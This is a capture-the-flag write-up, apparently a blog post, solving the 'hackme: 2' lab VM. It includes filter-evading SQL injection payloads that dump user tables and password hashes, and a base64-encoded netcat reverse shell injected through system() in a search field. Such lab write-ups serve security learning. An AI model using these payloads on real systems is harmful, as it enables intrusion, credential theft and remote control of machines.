General Information
Name : hackme: 2
Difficulty: Medium
Date release: 6 Dec 2020
Author: x4bx54
Series: hackme
OS: Linux
IP: Automatically assign (192.168.163.134)
Goal: Get root user access
Scanning
nmap -sC -sV 192.168.163.134
Press enter or click to view image in full size
Enumeration
Let’s check the open port 80.
It displays a login page that requires a username and password.
Before going deeper, we can try scanning the directory contained in port 80 using dirbuster. Based on the scan results from dirbuster, we found welcome.php, the web homepage after logging in.
Press enter or click to view image in full size
Immediately, let’s sign up in register.php to create a username and password so we can input them in login.php.
After that, we log in by inputting the username and password to the login page. Then, we are successfully directed to the welcome.php page.
Press enter or click to view image in full size
The page displays data containing three columns containing book ID, book Title, and Cost. Based on this, we know that the table has three columns. Next, let’s try to test for sql injection vulnerabilities.
Press enter or click to view image in full size
When we try to perform a basic vulnerability test using ‘, the web does not display anything that reflects a vulnerability. We tried various sql injection query techniques until we found references to techniques that use /**/ and #. The /**/ technique inserts spaces in SQL queries without breaking the query syntax to circumvent filters or firewalls that may try to detect or block malicious characters or keywords. At the same time, the # technique is used as a comment to terminate the original SQL query and ignore the rest of the query.
The sql query used is:
‘/**/union/**/select/**/NULL, NULL, NULL#
Press enter or click to view image in full size
Next, we try to find the names of the tables in the current database using this query:
‘/**/union/**/select/**/table_name, NULL, NULL/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema=database()#
In the query, there is a where clause that checks whether information_schema.tables is in the same database as the current database, i.e. database() returns the current database name. As a result, we find two tables, one of which is very interesting to explore further.
Press enter or click to view image in full size
Next, we try to see the contents of the columns contained in the interesting table by using the query:
‘/**/union/**/select/**/column_name, NULL, NULL/**/FROM/**/information_schema.columns/**/WHERE/**/table_name=’users’#.
As a result, we find two credential columns that contain information to log in, namely USER and pasword.
Press enter or click to view image in full size
Let’s see the contents of the table using the query:
‘/**/union/**/select/**/user, pasword, NULL/**/FROM/**/users#.
Press enter or click to view image in full size
Wow, we have various usernames and passwords in the hashed state.
Get Smile09’s stories in your inbox
Join Medium for free to get updates from this writer.
We tried to find a website that could translate the hash until we finally found it.
Press enter or click to view image in full size
Then, we input the admin username and password on the login page. As a result, we managed to enter the admin page.
Press enter or click to view image in full size
From here, I tried the image upload feature by uploading an image according to the JPEG extension which the system accepted, but when I tried to upload something other than the image extension, the system would reject it and provide information on the extension it only received.
Press enter or click to view image in full size
Next, we try to use the user search feature by inputting a command such as system(“ls”). First, we try to input the first name. The result is that the system displays what we input.
Next, we try to input the last name. The result is that the system displays the output command that has been input previously.
Press enter or click to view image in full size
From this, we can conclude to allow reverse shell input into the system through the Last name.
Gaining Access
Let’s try the reverse shell command input. The result failed, which turned out that the system read all inputs spliced without using spaces. Like this:
Press enter or click to view image in full size
After trying for a long time to find various ways for the system to read inputs with spaces, we found a reference that tries to outsmart it by getting the system to decode base 64 to be able to read inputs using spaces. Therefore, we encode the base 64 reverse shell first.
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xNjMuMTI5IDU1NTUgPi90bXAvZg==
So, if combined with the command to decode base64 it would be as follows:
system(base64_decode(“cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xNjMuMTI5IDU1NTUgPi90bXAvZg==”))
Result: Success!
We successfully gained access to the system.
Press enter or click to view image in full size
Privilege Escalation
Let’s check the contents of each folder in the system.
After checking each folder one by one, we finally managed to find the file to be able to access the root.
And
Press enter or click to view image in full size
Thank you for your time and attention in reading this article until the end. Until we meet again in another piece, take care and goodbye for now.